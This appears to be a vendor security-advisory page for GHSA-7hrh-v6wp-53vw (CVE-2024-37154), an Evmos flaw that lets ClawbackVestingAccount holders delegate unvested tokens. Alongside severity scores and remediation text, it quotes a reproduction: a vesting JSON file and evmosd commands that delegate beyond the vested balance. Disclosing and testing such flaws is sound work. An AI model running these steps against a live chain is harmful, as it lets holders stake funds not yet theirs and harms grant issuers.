How severe is GHSA-7hrh-v6wp-53vw?

GHSA-7hrh-v6wp-53vw has a CVSS score of 5.3/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-7hrh-v6wp-53vw?

GHSA-7hrh-v6wp-53vw affects the following packages: github.com/evmos/evmos/v18 (Go), github.com/evmos/evmos/v17 (Go), github.com/evmos/evmos/v16 (Go), github.com/evmos/evmos/v15 (Go), github.com/evmos/evmos/v14 (Go), github.com/evmos/evmos/v13 (Go), github.com/evmos/evmos/v12 (Go), github.com/evmos/evmos/v11 (Go), and 5 more. Ecosystems affected: Go.

How do I fix GHSA-7hrh-v6wp-53vw?

No patched version of github.com/evmos/evmos/v18 has shipped for GHSA-7hrh-v6wp-53vw yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.

How do I detect GHSA-7hrh-v6wp-53vw in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/evmos/evmos/v18. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-7hrh-v6wp-53vw if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-7hrh-v6wp-53vw?

O3 pinpoints whether GHSA-7hrh-v6wp-53vw is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-7hrh-v6wp-53vw actively exploited in the wild?

No public exploit code has been indexed for GHSA-7hrh-v6wp-53vw yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-7hrh-v6wp-53vw?

GHSA-7hrh-v6wp-53vw has an EPSS (Exploit Prediction Scoring System) score of 0.4%, placing it in the 30th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-7hrh-v6wp-53vw?

GHSA-7hrh-v6wp-53vw is classified as CWE-285 (CWE-285), CWE-863 (CWE-863). These weakness types describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation.

When was GHSA-7hrh-v6wp-53vw published, and has it been updated?

GHSA-7hrh-v6wp-53vw was published on June 6, 2024 and was last updated on October 15, 2024. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐹 Go

GHSA-7hrh-v6wp-53vw

MEDIUM

Evmos allows unvested token delegations

Also known asCVE-2024-37154GO-2024-2904

Published

Jun 6, 2024

Updated

Oct 15, 2024

Affected

13 pkgs

Patched

None yet

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.4%probability of exploitation in next 30 days

Lower Risk30th percentile+0.13%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

13 pkgs affected

🐹github.com/evmos/evmos/v18🐹github.com/evmos/evmos/v17🐹github.com/evmos/evmos/v16🐹github.com/evmos/evmos/v15🐹github.com/evmos/evmos/v14🐹github.com/evmos/evmos/v13🐹github.com/evmos/evmos/v12🐹github.com/evmos/evmos/v11+5 more

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Impact

What kind of vulnerability is it? Who is impacted?

At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via ClawbackVestingAccount.

Patches

Has the problem been patched? What versions should users upgrade to?

The PR linked to this advisory includes part of the fix. The remainder is in a second advisory on the Cosmos SDK fork.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

There is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.

References

Are there any links users can visit to find out more?

See the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:

Download vesting_setup.json with the following contents:

{
  "start_time": 1679602272,
  "periods": [
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 10 
    },
    {
      "coins": "100000000000000000000aevmos",
      "length_seconds": 259200000
    }
  ]
}

Run the following CLI commands to reproduce the issue locally:

evmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes

# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested
evmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

evmosd keys add key1 --recover --home ~/.tmp-evmosd
# Enter the following mnemonic
skate tell option purity cattle poverty street act bone govern way various

evmosd q staking validators --home ~/.tmp-evmosd | grep operator_address

# Substitute the operator address from the previous query
# Note that this delegates 70% of the user's available stake
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Re-run the same command
evmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes

# Note that the total delegations now exceed the user's vested balance
evmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd

Affected Packages

13 total

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/evmos/evmos/v18`	all versions	No fix
🐹Go	`github.com/evmos/evmos/v17`	all versions	No fix
🐹Go	`github.com/evmos/evmos/v16`	all versions	No fix
🐹Go	`github.com/evmos/evmos/v15`	all versions	No fix
🐹Go	`github.com/evmos/evmos/v14`	all versions	No fix
🐹Go	`github.com/evmos/evmos/v13`	all versions	No fix

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/evmos/evmos/v18. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of github.com/evmos/evmos/v18 has shipped for GHSA-7hrh-v6wp-53vw yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-7hrh-v6wp-53vw is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-7hrh-v6wp-53vw. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Impact _What kind of vulnerability is it? Who is impacted?_ At the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via `ClawbackVestingAccount`. ### Patches _Has the problem been patched? What versions should users upgrade to?_ [The PR linked to this advisory](https://github.com/evmos/evmos-ghsa-7hrh-v6wp-53vw/pull/1) includes part of the fix. The remainder is in a [second advisory on the Cosmos SDK fork](https://github.com/evmos/cosmos-sdk/security/advisories/GHSA-wj6f-x5wv-8pqv). ### Workarounds _Is t

O3 Security · Impact-Aware SCA

Is GHSA-7hrh-v6wp-53vw in your dependencies?

O3 detects GHSA-7hrh-v6wp-53vw across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works